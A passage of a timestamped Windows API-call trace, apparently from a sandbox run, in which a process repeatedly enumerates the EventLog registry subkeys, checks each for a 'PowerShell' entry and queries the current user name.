ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.288] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x34c) returned 0x0 [0074.288] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.288] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x350) returned 0x0 [0074.288] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.289] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x354) returned 0x0 [0074.289] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.289] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x358) returned 0x0 [0074.289] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.289] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x35c) returned 0x0 [0074.289] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.289] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x360) returned 0x0 [0074.289] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.289] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x364) returned 0x0 [0074.290] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2 [0074.290] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x368) returned 0x0 [0074.290] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x36c) returned 0x0 [0074.290] RegCloseKey (hKey=0x36c) returned 0x0 [0074.290] RegCloseKey (hKey=0x320) returned 0x0 [0074.290] RegCloseKey (hKey=0x368) returned 0x0 [0074.341] CoTaskMemAlloc (cb=0x804) returned 0x1b3d4e80 [0074.341] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d4e80, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.342] CoTaskMemFree (pv=0x1b3d4e80) [0074.343] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.343] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.344] CoTaskMemFree (pv=0x432650) [0074.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x370) returned 0x0 [0074.427] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad23c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad238*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.427] CoTaskMemFree (pv=0x0) [0074.427] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.427] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.427] CoTaskMemFree (pv=0x432650) [0074.427] CoTaskMemFree (pv=0x0) [0074.427] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.427] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.428] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.428] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.428] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.428] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.428] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.428] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.428] CoTaskMemFree (pv=0x432650) [0074.428] CoTaskMemFree (pv=0x0) [0074.428] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.429] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.429] CoTaskMemFree (pv=0x432650) [0074.429] CoTaskMemFree (pv=0x0) [0074.429] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x374) returned 0x0 [0074.429] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.429] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x378) returned 0x0 [0074.429] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.429] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x37c) returned 0x0 [0074.429] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.429] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x380) returned 0x0 [0074.429] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.429] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x384) returned 0x0 [0074.429] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.430] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x388) returned 0x0 [0074.430] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.430] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x38c) returned 0x0 [0074.430] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.430] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x390) returned 0x0 [0074.430] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.430] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x394) returned 0x0 [0074.430] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x398) returned 0x0 [0074.430] RegCloseKey (hKey=0x398) returned 0x0 [0074.431] RegCloseKey (hKey=0x370) returned 0x0 [0074.431] RegCloseKey (hKey=0x394) returned 0x0 [0074.431] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x394) returned 0x0 [0074.432] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad23c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad238*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x432650) [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x432650) [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x432650) [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x432650) [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x432650) [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.432] CoTaskMemFree (pv=0x432650) [0074.432] CoTaskMemFree (pv=0x0) [0074.432] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.432] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.433] CoTaskMemFree (pv=0x432650) [0074.433] CoTaskMemFree (pv=0x0) [0074.433] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.433] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.433] CoTaskMemFree (pv=0x432650) [0074.433] CoTaskMemFree (pv=0x0) [0074.433] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.433] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x432650, lpcchName=0x1ad2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.433] CoTaskMemFree (pv=0x432650) [0074.433] CoTaskMemFree (pv=0x0) [0074.433] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x370) returned 0x0 [0074.433] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.433] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x398) returned 0x0 [0074.433] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.433] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x39c) returned 0x0 [0074.433] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.434] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3a0) returned 0x0 [0074.434] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.434] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3a4) returned 0x0 [0074.434] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.434] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3a8) returned 0x0 [0074.434] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.434] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3ac) returned 0x0 [0074.434] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.434] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3b0) returned 0x0 [0074.434] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x0) returned 0x2 [0074.435] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3b4) returned 0x0 [0074.435] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad328 | out: phkResult=0x1ad328*=0x3b8) returned 0x0 [0074.435] RegCloseKey (hKey=0x3b8) returned 0x0 [0074.435] RegCloseKey (hKey=0x394) returned 0x0 [0074.435] RegCloseKey (hKey=0x3b4) returned 0x0 [0074.436] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3b4) returned 0x0 [0074.436] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.436] CoTaskMemFree (pv=0x0) [0074.436] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.436] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x0, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.436] CoTaskMemFree (pv=0x432650) [0074.436] CoTaskMemFree (pv=0x0) [0074.436] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.436] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x1, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.436] CoTaskMemFree (pv=0x432650) [0074.436] CoTaskMemFree (pv=0x0) [0074.436] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.436] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x2, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.436] CoTaskMemFree (pv=0x432650) [0074.436] CoTaskMemFree (pv=0x0) [0074.436] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.436] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x3, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.437] CoTaskMemFree (pv=0x432650) [0074.437] CoTaskMemFree (pv=0x0) [0074.437] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.437] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x4, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.437] CoTaskMemFree (pv=0x432650) [0074.437] CoTaskMemFree (pv=0x0) [0074.437] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.437] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x5, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.437] CoTaskMemFree (pv=0x432650) [0074.437] CoTaskMemFree (pv=0x0) [0074.437] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.437] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x6, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.437] CoTaskMemFree (pv=0x432650) [0074.437] CoTaskMemFree (pv=0x0) [0074.437] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.437] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x7, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.437] CoTaskMemFree (pv=0x432650) [0074.437] CoTaskMemFree (pv=0x0) [0074.437] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.437] RegEnumKeyExW (in: hKey=0x3b4, dwIndex=0x8, lpName=0x432650, lpcchName=0x1ad298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.437] CoTaskMemFree (pv=0x432650) [0074.437] CoTaskMemFree (pv=0x0) [0074.437] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x394) returned 0x0 [0074.437] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.437] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3b8) returned 0x0 [0074.438] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.438] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3bc) returned 0x0 [0074.438] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.438] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: 